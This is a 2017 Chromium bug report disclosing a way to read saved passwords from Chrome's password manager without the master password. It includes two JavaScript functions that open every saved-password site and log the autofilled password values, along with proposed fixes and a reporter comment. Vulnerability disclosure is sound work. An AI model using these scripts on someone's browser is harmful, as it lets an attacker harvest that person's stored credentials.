Security: Chrome Password Manager Authentication Bypass
Reported by landonja...@gmail.com, Feb 12 2017
Issue description
VULNERABILITY DETAILS
The exploit can be used to gather a user's admin-protected passwords on Google Chrome without their master password. Chrome's password manager is effectively made useless.
VERSIONS
Chrome Version: 56.0.2924.87 (Official Build) (32-bit)
Operating System: Chrome-OS ARM
Chrome Version: 56.0.2924.87 (Official Build) (64-bit)
Operating System: Windows
Probably works on all Chrome versions which include Chrome's Password Manager.
REPRODUCTION CASE
Navigate to chrome://settings/passwords and either use the following JavaScript function to open the top few webpages, or open as many as you desire manually.
    function openPasswordedSites() {
        var listOfSites = document.getElementById("saved-passwords-list").children;
        var list = [];
        for (var i = 0; i < listOfSites.length; i++) {
            if (listOfSites[i].className != "spacer")
                window.open(listOfSites[i].children[0].children[0].title);
        }
    }
After the sites have been opened, they're automatically filled with passwords which are "starred-out" to avoid shoulder-surfing. The page's password forms can then be manually altered using inspect-element to show the user's passwords by changing their type from "password" to "text", but to automate this process, the attacker could use this JavaScript function and launch it from the page:
    function logPagePasswords() {
        console.log(window.location.href);
        var passwords = document.querySelectorAll("[type=password]");
        var passList = [];
        for (var i = 0; i < passwords.length; i++) {
            console.log(passwords[i].value);
            passList.push(passwords[i].value);
        }
        return passList;
    }
This exploit could be further automated using a chrome plugin.
PROPOSED SOLUTIONS
Require user to enter their master-password to auto-fill a form.
Star out websites and usernames associated with websites on the settings/passwords page until the user has entered their master-password.
Feb 12 2017
If that's the case, why is there password protection for the "show" button? Why is there a "show" button at all? Why not just spit the passwords out in plaintext? Clearly it's not intentional.

> There is very little chrome can do.

Either of my proposed solutions could be implemented within Chromium. Why have a password manager if they're just going to be accessible by any given global chrome plugin as soon as a page loads?
May 22 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by jialiul@chromium.org, Feb 12 2017